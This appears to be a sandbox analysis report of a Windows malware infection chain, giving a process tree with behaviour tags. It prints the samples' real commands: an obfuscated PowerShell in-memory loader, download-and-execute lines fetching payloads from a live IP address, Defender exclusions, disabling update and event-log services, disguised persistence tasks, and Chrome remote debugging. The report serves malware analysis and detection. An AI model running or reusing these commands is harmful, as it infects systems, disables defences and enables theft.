PID 1648 wrote to memory of 3316	1648	Ryu8yUx.exe	93
PID 3808 wrote to memory of 3124	3808	powershell.exe	98
PID 3808 wrote to memory of 3124	3808	powershell.exe	98
PID 3808 wrote to memory of 3124	3808	powershell.exe	98
PID 4604 wrote to memory of 4472	4604	skotes.exe	104
PID 4604 wrote to memory of 4472	4604	skotes.exe	104
PID 4604 wrote to memory of 3124	4604	skotes.exe	105
PID 4604 wrote to memory of 3124	4604	skotes.exe	105
PID 4604 wrote to memory of 3124	4604	skotes.exe	105
PID 4072 wrote to memory of 1352	4072	cmd.exe	115
PID 4072 wrote to memory of 1352	4072	cmd.exe	115
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4472 wrote to memory of 4444	4472	UN8QxIq.exe	127
PID 4444 wrote to memory of 612	4444	dialer.exe	5
PID 4444 wrote to memory of 672	4444	dialer.exe	7
PID 4444 wrote to memory of 944	4444	dialer.exe	12
PID 4444 wrote to memory of 60	4444	dialer.exe	13
PID 4444 wrote to memory of 432	4444	dialer.exe	14
PID 672 wrote to memory of 2684	672	lsass.exe	47
PID 672 wrote to memory of 2684	672	lsass.exe	47
PID 672 wrote to memory of 2684	672	lsass.exe	47
PID 4444 wrote to memory of 888	4444	dialer.exe	15
PID 4444 wrote to memory of 1016	4444	dialer.exe	16
PID 4444 wrote to memory of 1128	4444	dialer.exe	18
PID 4444 wrote to memory of 1164	4444	dialer.exe	19
PID 4444 wrote to memory of 1180	4444	dialer.exe	20
PID 4444 wrote to memory of 1280	4444	dialer.exe	21
PID 4444 wrote to memory of 1292	4444	dialer.exe	22
PID 4444 wrote to memory of 1340	4444	dialer.exe	23
PID 4444 wrote to memory of 1372	4444	dialer.exe	24
PID 4444 wrote to memory of 1456	4444	dialer.exe	25
PID 4444 wrote to memory of 1552	4444	dialer.exe	26
PID 4444 wrote to memory of 1568	4444	dialer.exe	27

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:60

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1128
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2924
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1836
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  PID:3636
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  PID:5384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1456
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1568

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1656

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2660

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2740

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3408

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
PID:3504
- C:\Users\Admin\AppData\Local\Temp\35f030b7d73472a67a55161a98d37678.exe
  "C:\Users\Admin\AppData\Local\Temp\35f030b7d73472a67a55161a98d37678.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4620
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4604
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4484
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4640
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1912
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3124
  - - C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
      "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1648
    - - C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 816
        5⤵
        Program crash
        
        PID:424
  - - C:\Users\Admin\AppData\Local\Temp\1073867001\UN8QxIq.exe
      "C:\Users\Admin\AppData\Local\Temp\1073867001\UN8QxIq.exe"
      4⤵
      Checks BIOS information in registry
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4472
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3656
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4072
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:1352
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:5076
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4596
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3292
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:3288
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:4716
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3816
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2344
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3416
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4444
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "YUPXPWRM"
        5⤵
        Launches sc.exe
        
        PID:2644
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:2032
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:3804
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "YUPXPWRM"
        5⤵
        Launches sc.exe
        
        PID:4712
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3296
  - - C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
      "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3124
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3488
  - - C:\Users\Admin\AppData\Local\Temp\1073975001\WveK4j1.exe
      "C:\Users\Admin\AppData\Local\Temp\1073975001\WveK4j1.exe"
      4⤵
      Executes dropped EXE
      PID:1116
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3200
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:3628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2780
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:2040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4312
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:5040
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\UMLOU'"
        5⤵
        
        PID:424
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\UMLOU'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        5⤵
        
        PID:3224
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3132
    - - C:\UMLOU\mmytljldrgl.exe
        
        "C:\UMLOU\mmytljldrgl.exe"
        5⤵
        
        PID:2356
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3532
      - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        6⤵
        
        PID:3216
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1792
  - - C:\Users\Admin\AppData\Local\Temp\1074030001\b607327591.exe
      "C:\Users\Admin\AppData\Local\Temp\1074030001\b607327591.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4736
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn Ff2W9maW1C6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\gRkGvLpR8.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        
        PID:3896
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1596
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn Ff2W9maW1C6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\gRkGvLpR8.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1580
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\gRkGvLpR8.hta
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4644
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AWZW6SGGF1BX3JWWUIZKVD4Z1IJLXGA1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\TempAWZW6SGGF1BX3JWWUIZKVD4Z1IJLXGA1.EXE
        
        "C:\Users\Admin\AppData\Local\TempAWZW6SGGF1BX3JWWUIZKVD4Z1IJLXGA1.EXE"
        7⤵
        
        PID:2624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1074031021\am_no.cmd" "
      4⤵
      PID:3172
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1074031021\am_no.cmd" any_word
        5⤵
        
        PID:2856
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        Delays execution with timeout.exe
        
        PID:2804
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        
        PID:940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4312
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3500
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3016
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "OpVCsmaC6ul" /tr "mshta \"C:\Temp\RTAX1IlWZ.hta\"" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5004
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\RTAX1IlWZ.hta"
        6⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        8⤵
        
        PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\1074038001\8815489b61.exe
      "C:\Users\Admin\AppData\Local\Temp\1074038001\8815489b61.exe"
      4⤵
      PID:4004
  - - C:\Users\Admin\AppData\Local\Temp\1074039001\4edd405582.exe
      "C:\Users\Admin\AppData\Local\Temp\1074039001\4edd405582.exe"
      4⤵
      PID:940
    - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        
        PID:4700
  - - C:\Users\Admin\AppData\Local\Temp\1074040001\74743963fb.exe
      "C:\Users\Admin\AppData\Local\Temp\1074040001\74743963fb.exe"
      4⤵
      PID:3152
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:4872
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9442ecc40,0x7ff9442ecc4c,0x7ff9442ecc58
        6⤵
        
        PID:3664
  - - C:\Users\Admin\AppData\Local\Temp\1074041001\aa3bf5e65c.exe
      "C:\Users\Admin\AppData\Local\Temp\1074041001\aa3bf5e65c.exe"
      4⤵
      PID:1836
    - - C:\Users\Admin\AppData\Local\Temp\YU60JBP33M9ZSWLGDC20V9NZIR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\YU60JBP33M9ZSWLGDC20V9NZIR.exe"
        5⤵
        
        PID:5576
  - - C:\Users\Admin\AppData\Local\Temp\1074042001\89856c9631.exe
      "C:\Users\Admin\AppData\Local\Temp\1074042001\89856c9631.exe"
      4⤵
      PID:4692
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
